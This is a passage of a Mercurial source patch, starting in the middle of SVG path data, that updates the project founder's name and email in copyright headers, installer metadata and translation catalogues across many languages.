d="M-144.47,67.571c0.07,0.805,1.17,1.838,2.9,2.312,1.49,0.408,5.32,1.45,10.25-1.658,4.92-3.108,5.49-11.421,3.25-13.865-0.69-1.239-1.59-2.14-0.88-0.164,1.81,4.99-1.7,9.659-4.74,11.82-3.03,2.162-6.88,1.139-8.45,0.66s-2.4,0.064-2.33,0.895z"/><path id="path2597" fill="#FFF" 
d="M-138.11,68.688c0.45-0.406,2.73-0.24,4.79-1.35,2.07-1.109,4.52-3.54,4.95-6.994,0.26-2.029,0.34-1.519,0.44-0.415-0.32,5.743-5.6,8.916-8.62,9.334-0.82,0.113-2.25,0.044-1.56-0.575z"/><path id="path2561_1_" fill="#999" d="M-47.767,69.694c8.532-24.594-9.323-61.736-45.446-57.268-32.637,4.035-33.167,38.389-4.4,46.55,32.582,4.933,12.962,29.512,10.179,41.904-2.495,11.11,26.331,12.94,39.667-31.186z"/><path id="path2571" fill="#f3f3f3" d="M-70.093,88.904c-8.827-1.092-21.529,18.836-9.552,16.506,5.756-0.86,10.525-2.89,14.794-7.762,5.567-6.353,13.883-20.074,16.288-28.94,2.025-7.476,1.007-19.057-1.081-8.175-2.142,11.167-11.623,29.464-20.449,28.371z"/><path id="path2581" fill="#999" d="M-129.39,104.85c2.05,0.03,3.28,0.32,5.35,1.77,4.09,1.7,11.61,0.62,15.09-3.95,3.47-4.57,3.58-10.868,2.26-14.674-3.24-9.314-16.99-9.149-23.13-1.417-6.64,8.636-1.61,18.231,0.43,18.271z"/><path id="path2593_2_" fill="#999" d="M-147.64,61.684c0.41,1.282,1.45,3.154,3.65,3.466,2.94,0.417,3.54,1.743,7,1.055,3.47-0.688,6.09-3.528,7.14-6.67,1.21-4.347-0.59-6.591-3.31-8.595-2.71-2.003-8.67-1.788-12.23,1.458-2.53,2.305-3.24,6.163-2.25,9.286z"/><path id="path256" fill="#f3f3f3" d="M-136.11,64.558c2.66-0.697,6.18-4.325,4.44-7.096-2.16-3.413-8.17-0.491-8.37,3.309-0.21,3.802,1.11,4.526,3.93,3.787z"/><path id="path258" fill="#f3f3f3" d="M-116.12,105.51c2.28-0.6,9.24-3.43,7.93-13.547-0.66-5.126-3.46,6.361-8.63,8.077-7.85,2.61-6.97,7.48,0.7,5.47z"/></g> </svg> diff --git a/contrib/memory.py b/contrib/memory.py --- a/contrib/memory.py +++ b/contrib/memory.py @@ -1,6 +1,6 @@ # memory.py - track memory usage # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/contrib/packaging/debian/copyright b/contrib/packaging/debian/copyright --- a/contrib/packaging/debian/copyright +++ b/contrib/packaging/debian/copyright @@ -3,7 +3,7 @@ Source: https://www.mercurial-scm.org/ Files: * -Copyright: 2005-2021, Matt Mackall <mpm@selenic.com> and others. +Copyright: 2005-2021, Olivia Mackall <olivia@selenic.com> and others. License: GPL-2+ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public diff --git a/contrib/packaging/inno/mercurial.iss b/contrib/packaging/inno/mercurial.iss --- a/contrib/packaging/inno/mercurial.iss +++ b/contrib/packaging/inno/mercurial.iss @@ -6,7 +6,7 @@ #endif [Setup] -AppCopyright=Copyright 2005-2021 Matt Mackall and others +AppCopyright=Copyright 2005-2021 Olivia Mackall and others AppName=Mercurial AppVersion={#VERSION} OutputBaseFilename=Mercurial-{#VERSION}{#SUFFIX} @@ -20,7 +20,7 @@ InfoAfterFile=../postinstall.txt LicenseFile=Copying.txt ShowLanguageDialog=yes -AppPublisher=Matt Mackall and others +AppPublisher=Olivia Mackall and others AppPublisherURL=https://mercurial-scm.org/ AppSupportURL=https://mercurial-scm.org/ AppUpdatesURL=https://mercurial-scm.org/ @@ -29,8 +29,8 @@ DefaultDirName={pf}\Mercurial SourceDir=stage VersionInfoDescription=Mercurial distributed SCM (version {#VERSION}) -VersionInfoCopyright=Copyright 2005-2021 Matt Mackall and others -VersionInfoCompany=Matt Mackall and others +VersionInfoCopyright=Copyright 2005-2021 Olivia Mackall and others +VersionInfoCompany=Olivia Mackall and others VersionInfoVersion={#QUAD_VERSION} InternalCompressLevel=max SolidCompression=true diff --git a/contrib/packaging/wix/mercurial.wxs b/contrib/packaging/wix/mercurial.wxs --- a/contrib/packaging/wix/mercurial.wxs +++ b/contrib/packaging/wix/mercurial.wxs @@ -19,14 +19,14 @@ Name='Mercurial $(var.Version) ($(var.Platform))' UpgradeCode='$(var.ProductUpgradeCode)' Language='1033' Codepage='1252' Version='$(var.Version)' - 
Manufacturer='Matt Mackall and others'> + Manufacturer='Olivia Mackall and others'> <Package Id='*' Keywords='Installer' Description="Mercurial distributed SCM (version $(var.Version))" Comments='$(var.Comments)' Platform='$(var.Platform)' - Manufacturer='Matt Mackall and others' + Manufacturer='Olivia Mackall and others' InstallerVersion='300' Languages='1033' Compressed='yes' SummaryCodepage='1252' /> <Media Id='1' Cabinet='mercurial.cab' EmbedCab='yes' DiskPrompt='CD-ROM #1' diff --git a/contrib/win32/ReadMe.html b/contrib/win32/ReadMe.html --- a/contrib/win32/ReadMe.html +++ b/contrib/win32/ReadMe.html @@ -140,7 +140,7 @@ </p> <p> - Mercurial is Copyright 2005-2021 Matt Mackall and others. + Mercurial is Copyright 2005-2021 Olivia Mackall and others. </p> <p> diff --git a/doc/runrst b/doc/runrst --- a/doc/runrst +++ b/doc/runrst @@ -2,7 +2,7 @@ # # runrst - register custom roles and run correct writer # -# Copyright 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright 2010 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hg b/hg --- a/hg +++ b/hg @@ -2,7 +2,7 @@ # # mercurial - scalable distributed SCM # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/hgdemandimport/demandimportpy2.py b/hgdemandimport/demandimportpy2.py --- a/hgdemandimport/demandimportpy2.py +++ b/hgdemandimport/demandimportpy2.py @@ -1,6 +1,6 @@ # demandimport.py - global demand-loading of modules for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/__init__.py b/hgext/convert/__init__.py --- a/hgext/convert/__init__.py +++ b/hgext/convert/__init__.py @@ -1,6 +1,6 @@ # convert.py Foreign SCM converter # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/common.py b/hgext/convert/common.py --- a/hgext/convert/common.py +++ b/hgext/convert/common.py @@ -1,6 +1,6 @@ # common.py - common code for the convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/convcmd.py b/hgext/convert/convcmd.py --- a/hgext/convert/convcmd.py +++ b/hgext/convert/convcmd.py @@ -1,6 +1,6 @@ # convcmd - convert extension commands definition # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/hgext/convert/cvs.py b/hgext/convert/cvs.py --- a/hgext/convert/cvs.py +++ b/hgext/convert/cvs.py @@ -1,6 +1,6 @@ # cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/darcs.py b/hgext/convert/darcs.py --- a/hgext/convert/darcs.py +++ b/hgext/convert/darcs.py @@ -1,6 +1,6 @@ # darcs.py - darcs support for the convert extension # -# Copyright 2007-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2007-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/git.py b/hgext/convert/git.py --- a/hgext/convert/git.py +++ b/hgext/convert/git.py @@ -1,6 +1,6 @@ # git.py - git support for the convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/hg.py b/hgext/convert/hg.py --- a/hgext/convert/hg.py +++ b/hgext/convert/hg.py @@ -1,6 +1,6 @@ # hg.py - hg backend for convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -1,6 +1,6 @@ # patchbomb.py - sending Mercurial changesets as patch emails # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/share.py b/hgext/share.py --- a/hgext/share.py +++ b/hgext/share.py @@ -1,4 +1,4 @@ -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/win32text.py b/hgext/win32text.py --- a/hgext/win32text.py +++ b/hgext/win32text.py @@ -1,6 +1,6 @@ # win32text.py - LF <-> CRLF/CR translation utilities for Windows/Mac users # -# Copyright 2005, 2007-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005, 2007-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/zeroconf/__init__.py b/hgext/zeroconf/__init__.py --- a/hgext/zeroconf/__init__.py +++ b/hgext/zeroconf/__init__.py @@ -1,6 +1,6 @@ # zeroconf.py - zeroconf support for Mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/i18n/da.po b/i18n/da.po --- a/i18n/da.po +++ b/i18n/da.po @@ -1,6 +1,6 @@ # Danish translations for Mercurial # Danske oversættelser for Mercurial -# Copyright (C) 2009, 2010 Matt Mackall and others +# Copyright (C) 2009, 2010 Olivia Mackall and others # # Translation dictionary: # @@ -11359,11 +11359,11 @@ msgstr "(se http://mercurial.selenic.com for mere information)" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall og andre\n" +"Copyright (C) 2005-2011 Olivia Mackall og andre\n" "Dette er frit programmel; se kildekoden for kopieringsbetingelser. Der\n" "gives INGEN GARANTI; ikke engang for SALGBARHED eller EGNETHED FOR\n" "NOGET BESTEMT FORMÅL.\n" diff --git a/i18n/de.po b/i18n/de.po --- a/i18n/de.po +++ b/i18n/de.po @@ -1,6 +1,6 @@ # German translations for Mercurial # Deutsche Übersetzungen für Mercurial -# Copyright (C) 2009 Matt Mackall and others +# Copyright (C) 2009 Olivia Mackall and others # # Übersetzer: # Tobias Bell @@ -14536,11 +14536,11 @@ msgstr "(siehe http://mercurial.selenic.com für mehr Information)" msgid "" -"Copyright (C) 2005-2014 Matt Mackall and others\n" +"Copyright (C) 2005-2014 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2014 Matt Mackall und andere\n" +"Copyright (C) 2005-2014 Olivia Mackall und andere\n" "Dies ist freie Software; siehe Quellen für Kopierbestimmungen. 
Es besteht\n" "KEINE Gewährleistung für das Programm, nicht einmal der Marktreife oder der\n" "Verwendbarkeit für einen bestimmten Zweck.\n" @@ -18893,7 +18893,7 @@ msgstr "" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -19032,7 +19032,7 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" msgid "" @@ -19050,7 +19050,7 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2014 Matt Mackall.\n" +"Copyright (C) 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" @@ -19088,7 +19088,7 @@ "Vadim Gelfer <vadim.gelfer@gmail.com>" msgstr "" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." msgstr "" msgid "" @@ -19101,7 +19101,7 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" @@ -19307,7 +19307,7 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." 
msgstr "" diff --git a/i18n/el.po b/i18n/el.po --- a/i18n/el.po +++ b/i18n/el.po @@ -1,7 +1,7 @@ # Greek translations for Mercurial # Ελληνική μετάφραση των μηνυμάτων του Mercurial # -# Copyright (C) 2009 Matt Mackall και άλλοι +# Copyright (C) 2009 Olivia Mackall και άλλοι # msgid "" msgstr "" @@ -7606,12 +7606,12 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" "\n" -"Πνευματικά δικαιώματα (C) 2005-2009 Matt Mackall <mpm@selenic.com> και άλλοι\n" +"Πνευματικά δικαιώματα (C) 2005-2009 Olivia Mackall <olivia@selenic.com> και άλλοι\n" "Αυτό το πρόγραμμα είναι ελεύθερο λογισμικό· δείτε τον πηγαίο κώδικα για\n" "την άδεια χρήσης του. Δεν παρέχεται ΚΑΜΙΑ εγγύηση· ούτε καν για την\n" "ΕΜΠΟΡΕΥΣΙΜΟΤΗΤΑ ή την ΚΑΤΑΛΛΗΛΟΤΗΤΑ ΓΙΑ ΚΑΠΟΙΟ ΣΚΟΠΟ.\n" diff --git a/i18n/fr.po b/i18n/fr.po --- a/i18n/fr.po +++ b/i18n/fr.po @@ -1,6 +1,6 @@ # French translations for Mercurial # Traductions françaises de Mercurial -# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others # # Quelques règles : # - dans l'aide d'une commande, la première ligne descriptive @@ -9412,7 +9412,7 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. 
There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" diff --git a/i18n/hggettext b/i18n/hggettext --- a/i18n/hggettext +++ b/i18n/hggettext @@ -2,7 +2,7 @@ # # hggettext - carefully extract docstrings for Mercurial # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/i18n/it.po b/i18n/it.po --- a/i18n/it.po +++ b/i18n/it.po @@ -1,6 +1,6 @@ # Italian translations for Mercurial # Traduzione italiana per Mercurial -# Copyright (C) 2009 Matt Mackall and others +# Copyright (C) 2009 Olivia Mackall and others msgid "" msgstr "" "Project-Id-Version: Mercurial\n" @@ -8881,11 +8881,11 @@ msgstr "" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall e altri\n" +"Copyright (C) 2005-2011 Olivia Mackall e altri\n" "Questo è software libero; vedere i sorgenti per le condizioni di copia.\n" "Non c'è ALCUNA garanzia; neppure di COMMERCIABILITÀ o IDONEITÀ AD UNO\n" "SCOPO PARTICOLARE.\n" diff --git a/i18n/ja.po b/i18n/ja.po --- a/i18n/ja.po +++ b/i18n/ja.po @@ -18771,11 +18771,11 @@ msgstr "(詳細は https://mercurial-scm.org を参照)" msgid "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. 
There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "本製品はフリーソフトウェアです。\n" "頒布条件に関しては同梱されるライセンス条項をお読みください。\n" "市場適合性や特定用途への可否を含め、 本製品は無保証です。\n" @@ -30239,11 +30239,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "著者\n" "\"\"\"\"\n" -"Matt Mackall <mpm@selenic.com>" +"Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -30264,13 +30264,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30293,12 +30293,12 @@ "----------------------------------" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" msgstr "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -30471,13 +30471,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." 
msgstr "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30519,8 +30519,8 @@ "====\n" "本マニュアルページの著者は Vadim Gelfer <vadim.gelfer@gmail.com> です。" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial の著者は Matt Mackall <mpm@selenic.com> です。" +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial の著者は Olivia Mackall <olivia@selenic.com> です。" msgid "" "See Also\n" @@ -30536,14 +30536,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Copying\n" "=======\n" "本マニュアルページの著作権は copyright 2006 Vadim Gelfer です。\n" -"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n" +"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -30825,14 +30825,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." 
msgstr "" "Copying\n" "=======\n" "本マニュアルの著作権は copyright 2005 Bryan O'Sullivan です。\n" -"Mercurial の著作権は copyright 2005-2017 Matt Mackall です。\n" +"Mercurial の著作権は copyright 2005-2017 Olivia Mackall です。\n" "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" "Public License の元での自由な利用が保証されています。" @@ -39790,13 +39790,13 @@ #~ msgid "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Free use of this software is granted under the terms of the GNU General\n" #~ "Public License version 2 or any later version." #~ msgstr "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "本ソフトウェアは、 バージョン2またはそれ以降の GNU General\n" #~ "Public License の元での自由な利用が保証されています。" diff --git a/i18n/pt_BR.po b/i18n/pt_BR.po --- a/i18n/pt_BR.po +++ b/i18n/pt_BR.po @@ -1,6 +1,6 @@ # Brazilian Portuguese translations for Mercurial # Traduções do Mercurial para português do Brasil -# Copyright (C) 2011 Matt Mackall and others +# Copyright (C) 2011 Olivia Mackall and others # # Translators: # Diego Oliveira <diego@diegooliveira.com> @@ -19269,11 +19269,11 @@ msgstr "(veja https://mercurial-scm.org para mais informações)" msgid "" -"Copyright (C) 2005-2018 Matt Mackall and others\n" +"Copyright (C) 2005-2018 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2018 Matt Mackall e outros\n" +"Copyright (C) 2005-2018 Olivia Mackall e outros\n" "Este software é livre; veja os fontes para condições de cópia. 
Não\n" "há garantias, nem mesmo de adequação para qualquer propósito em\n" "particular.\n" @@ -31340,11 +31340,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "Autor\n" "\"\"\"\"\"\n" -"Escrito por Matt Mackall <mpm@selenic.com>" +"Escrito por Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -31367,13 +31367,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "\"\"\"\"\"\n" -"Copyright (C) 2005-2016 Matt Mackall.\n" +"Copyright (C) 2005-2016 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31396,12 +31396,12 @@ "----------------------------------------------------" msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" msgstr "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -31581,13 +31581,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "\"\"\"\"\"\n" -"Copyright (C) 2005-2018 Matt Mackall.\n" +"Copyright (C) 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." 
@@ -31629,8 +31629,8 @@ "=====\n" "Vadim Gelfer <vadim.gelfer@gmail.com>" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial foi escrito por Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial foi escrito por Olivia Mackall <olivia@selenic.com>." msgid "" "See Also\n" @@ -31645,14 +31645,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "=====\n" "Esta página de manual: copyright 2006 Vadim Gelfer.\n" -"Mercurial: copyright 2005-2018 Matt Mackall.\n" +"Mercurial: copyright 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -31928,14 +31928,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2018 Matt Mackall.\n" +"Mercurial is copyright 2005-2018 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Cópia\n" "=====\n" "Esta página de manual: copyright 2005 Bryan O'Sullivan.\n" -"Mercurial: copyright 2005-2018 Matt Mackall.\n" +"Mercurial: copyright 2005-2018 Olivia Mackall.\n" "Garante-se livre uso deste software nos termos da licença\n" "GNU General Public License, versão 2 ou qualquer versão posterior." @@ -41308,13 +41308,13 @@ #~ msgid "" #~ "Copying\n" #~ "\"\"\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Free use of this software is granted under the terms of the GNU General\n" #~ "Public License version 2 or any later version." 
#~ msgstr "" #~ "Cópia\n" #~ "\"\"\"\"\"\n" -#~ "Copyright (C) 2005-2017 Matt Mackall.\n" +#~ "Copyright (C) 2005-2017 Olivia Mackall.\n" #~ "Garante-se livre uso deste software nos termos da licença\n" #~ "GNU General Public License, versão 2 ou qualquer versão posterior." diff --git a/i18n/ro.po b/i18n/ro.po --- a/i18n/ro.po +++ b/i18n/ro.po @@ -1,7 +1,7 @@ # Romanian translation for Mercurial # Traducerea în limba română pentru Mercurial # -# Copyright (C) 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2010 Olivia Mackall <olivia@selenic.com> and others # # # Glosar de traduceri @@ -10032,11 +10032,11 @@ msgstr "(vezi http://mercurial.selenic.com pentru mai multe informații)" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall și alții\n" +"Copyright (C) 2005-2011 Olivia Mackall și alții\n" "Acesta este software liber; vezi sursa pentru condițiile de copiere.\n" "Nu există NICIO garanție; nici măcar pentru COMERCIALIZARE sau\n" "COMPATIBILITATE ÎN ANUMITE SCOPURI.\n" diff --git a/i18n/ru.po b/i18n/ru.po --- a/i18n/ru.po +++ b/i18n/ru.po @@ -1,5 +1,5 @@ # Russian translations for Mercurial package. -# Copyright (C) 2011 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2011 Olivia Mackall <olivia@selenic.com> and others # This file is distributed under the same license as the Mercurial package. # === Glossary === # @@ -15590,11 +15590,11 @@ msgstr "(подробнее см. http://mercurial.selenic.com)" msgid "" -"Copyright (C) 2005-2014 Matt Mackall and others\n" +"Copyright (C) 2005-2014 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. 
